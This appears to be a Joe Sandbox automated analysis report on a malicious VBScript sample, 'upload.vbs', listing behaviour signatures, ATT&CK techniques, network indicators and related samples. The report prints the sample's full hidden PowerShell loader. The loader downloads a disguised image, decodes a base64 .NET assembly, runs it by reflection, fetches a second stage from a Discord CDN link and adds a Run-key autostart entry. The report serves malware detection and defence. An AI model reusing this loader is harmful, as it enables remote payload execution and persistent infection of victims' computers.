rebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'c:\programdata\' , 'cognitivo','regasm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information231
        Scripting
        Valid Accounts11
        Command and Scripting Interpreter
        231
        Scripting
        111
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote ServicesData from Local System1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        11
        Registry Run Keys / Startup Folder
        11
        Registry Run Keys / Startup Folder
        21
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        111
        Process Injection
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive3
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing
        LSA Secrets1
        File and Directory Discovery
        SSHKeylogging14
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials12
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448041 Sample: upload.vbs Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 31 paste.ee 2->31 33 uploaddeimagens.com.br 2->33 35 2 other IPs or domains 2->35 45 Multi AV Scanner detection for domain / URL 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 53 10 other signatures 2->53 10 wscript.exe 14 2->10         started        14 wscript.exe 2->14         started        16 wscript.exe 2->16         started        signatures3 51 Connects to a pastebin service (likely for C&C) 31->51 process4 dnsIp5 39 uploaddeimagens.com.br 188.114.97.3, 443, 49704, 49705 CLOUDFLARENETUS European Union 10->39 59 System process connects to network (likely due to code injection or exploit) 10->59 61 VBScript performs obfuscated calls to suspicious functions 10->61 63 Suspicious powershell command line found 10->63 67 4 other signatures 10->67 18 powershell.exe 7 10->18         started        65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->65 signatures6 process7 signatures8 41 Suspicious powershell command line found 18->41 43 Found suspicious powershell code related to unpacking or dynamic code loading 18->43 21 powershell.exe 15 17 18->21         started        25 conhost.exe 18->25         started        process9 dnsIp10 37 cdn.discordapp.com 162.159.135.233, 443, 49708 CLOUDFLARENETUS United States 21->37 55 Suspicious powershell command line found 21->55 57 Creates autostart registry keys with suspicious values (likely registry only malware) 21->57 27 powershell.exe 10 21->27         started        signatures11 process12 process13 29 conhost.exe 27->29         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        upload.vbs12%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        paste.ee3%VirustotalBrowse
        cdn.discordapp.com0%VirustotalBrowse
        uploaddeimagens.com.br5%VirustotalBrowse
        198.187.3.20.in-addr.arpa1%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://crl.microsoft0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://analytics.paste.ee0%URL Reputationsafe
        https://aka.ms/pscore60%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://crl.v0%URL Reputationsafe
        https://secure.gravatar.com0%URL Reputationsafe
        https://themes.googleusercontent.com0%URL Reputationsafe
        https://www.google.com;0%Avira URL Cloudsafe
        https://paste.ee/d/Vm93m/(0%Avira URL Cloudsafe
        https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634100%Avira URL Cloudmalware
        http://uploaddeimagens.com.br0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://cdn.discordapp.com/attachments/1235627023511191643/1243619513031987362/upload.txt?ex=6652226d&is=6650d0ed&hm=e24f0e1fec60caad959ff854ae7583062889e47feb76e2fd76c0a79601ace128&0%Avira URL Cloudsafe
        https://www.google.com0%Avira URL Cloudsafe
        https://paste.ee/d/Vm93mll0%Avira URL Cloudsafe
        https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?171630763413%VirustotalBrowse
        http://uploaddeimagens.com.br5%VirustotalBrowse
        https://paste.ee/d/Vm93m0%Avira URL Cloudsafe
        https://github.com/Pester/Pester1%VirustotalBrowse
        https://uploaddeimagens.com.br0%Avira URL Cloudsafe
        https://paste.ee/0%Avira URL Cloudsafe
        https://analytics.paste.ee;0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
        https://www.google.com0%VirustotalBrowse
        https://uploaddeimagens.com.br7%VirustotalBrowse
        https://paste.ee/1%VirustotalBrowse
        https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        paste.ee
        188.114.97.3
        truetrueunknown
        cdn.discordapp.com
        162.159.135.233
        truefalseunknown
        uploaddeimagens.com.br
        188.114.97.3
        truetrueunknown
        198.187.3.20.in-addr.arpa
        unknown
        unknowntrueunknown
        NameMaliciousAntivirus DetectionReputation
        https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634true
        • 13%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://cdn.discordapp.com/attachments/1235627023511191643/1243619513031987362/upload.txt?ex=6652226d&is=6650d0ed&hm=e24f0e1fec60caad959ff854ae7583062889e47feb76e2fd76c0a79601ace128&false
        • Avira URL Cloud: safe
        unknown
        https://paste.ee/d/Vm93mtrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: malware
        unknown
        http://crl.microsoftpowershell.exe, 00000002.00000002.2614806949.0000015D3EBB0000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://paste.ee/d/Vm93m/(wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.google.com;wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://analytics.paste.eewscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://aka.ms/pscore6powershell.exe, 00000002.00000002.2578636274.0000015D26B01000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://uploaddeimagens.com.brpowershell.exe, 00000004.00000002.2206715174.00000245A756E000.00000004.00000800.00020000.00000000.sdmpfalse
        • 5%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://www.google.comwscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F6601E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://paste.ee/d/Vm93mllwscript.exe, 00000000.00000003.2033034974.0000021F63E14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034480793.0000021F63E14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030902082.0000021F63DEF000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://uploaddeimagens.com.brpowershell.exe, 00000004.00000002.2206715174.00000245A1294000.00000004.00000800.00020000.00000000.sdmptrue
        • 7%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/powershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2443729806.00000245B10E3000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://paste.ee/wscript.exe, 00000000.00000002.2034976437.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2029725990.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FEC000.00000004.00000020.00020000.00000000.sdmptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://analytics.paste.ee;wscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F6601E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.2029725990.0000021F65FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F6601E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033170016.0000021F65855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2578636274.0000015D26B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2206715174.00000245A1071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2201174217.00000286E5CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2201174217.00000286E5CAA000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2578636274.0000015D26B4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2206715174.00000245A1071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2201174217.00000286E5CE4000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.vwscript.exe, 00000000.00000003.2029725990.0000021F66024000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031136368.0000021F66024000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2031451843.0000021F66031000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2035139367.0000021F66032000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://secure.gravatar.comwscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://themes.googleusercontent.comwscript.exe, 00000000.00000002.2034562228.0000021F63EA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2034976437.0000021F65FBC000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        188.114.97.3
        paste.eeEuropean Union
        13335CLOUDFLARENETUStrue
        162.159.135.233
        cdn.discordapp.comUnited States
        13335CLOUDFLARENETUSfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1448041
        Start date and time:2024-05-27 15:20:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 45s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:upload.vbs
        Detection:MAL
        Classification:mal100.spre.troj.expl.evad.winVBS@11/10@4/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 2
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .vbs
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 4952 because it is empty
        • Execution Graph export aborted for target powershell.exe, PID 7384 because it is empty
        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        09:21:00API Interceptor67x Sleep call for process: powershell.exe modified
        15:21:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbs
        15:21:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbs
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        188.114.97.3http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
        • worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
        http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
        • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
        http://twomancake.comGet hashmaliciousUnknownBrowse
        • twomancake.com/
        BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
        • fleur-de-lis.sbs/jhgfd
        Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
        • qr-in.com/YXcuqXy
        LHER000698175.xlsGet hashmaliciousUnknownBrowse
        • qr-in.com/JeYCrvM
        PO 4500025813.xlsGet hashmaliciousUnknownBrowse
        • qr-in.com/RtWEZGi
        SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
        • rocheholding.top/evie3/five/fre.php
        WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
        http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
        • hjkie5.pages.dev/
        162.159.135.233Cheat.Lab.2.7.2.msiGet hashmaliciousRedLineBrowse
        • cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
        #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
        • cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
        QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
        • cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
        We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
        • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
        mosoxxxHack.exeGet hashmaliciousAmadey RedLineBrowse
        • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
        Sales-contract-deaho-180521-poweruae.docGet hashmaliciousUnknownBrowse
        • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
        PURCHASE ORDER E3007921.EXEGet hashmaliciousSnake KeyloggerBrowse
        • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
        Waybill Document 22700456.exeGet hashmaliciousNanocoreBrowse
        • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
        COMPANY REQUIREMENT.docGet hashmaliciousSnake KeyloggerBrowse
        • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        paste.eeRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        LHER0006981753.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        upload.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        update.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        file.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        windows.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        INVOICE.jsGet hashmaliciousAgentTeslaBrowse
        • 188.114.97.3
        Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
        • 188.114.96.3
        Receipt #761.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        cdn.discordapp.comfile.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
        • 162.159.134.233
        XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
        • 162.159.129.233
        file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
        • 162.159.134.233
        https://cdn.discordapp.com/attachments/1240386543366049835/1242103657005318176/Payment_Confirmation_pdf.jar?ex=664c9ead&is=664b4d2d&hm=54d3627edfa4f918ed4c901322596ec71ddb0e6ac7cbb7aadf61cb1f960538ab&Get hashmaliciousUnknownBrowse
        • 162.159.133.233
        upload.vbsGet hashmaliciousUnknownBrowse
        • 162.159.133.233
        update.vbsGet hashmaliciousUnknownBrowse
        • 162.159.134.233
        file.vbsGet hashmaliciousUnknownBrowse
        • 162.159.130.233
        windows.vbsGet hashmaliciousUnknownBrowse
        • 162.159.129.233
        http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
        • 162.159.129.233
        Receipt #761.vbsGet hashmaliciousUnknownBrowse
        • 162.159.130.233
        uploaddeimagens.com.brRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        LHER0006981753.xlsGet hashmaliciousRemcosBrowse
        • 188.114.96.3
        Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        upload.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        update.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        file.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        windows.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        INVOICE.jsGet hashmaliciousAgentTeslaBrowse
        • 188.114.97.3
        Receipt #761.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
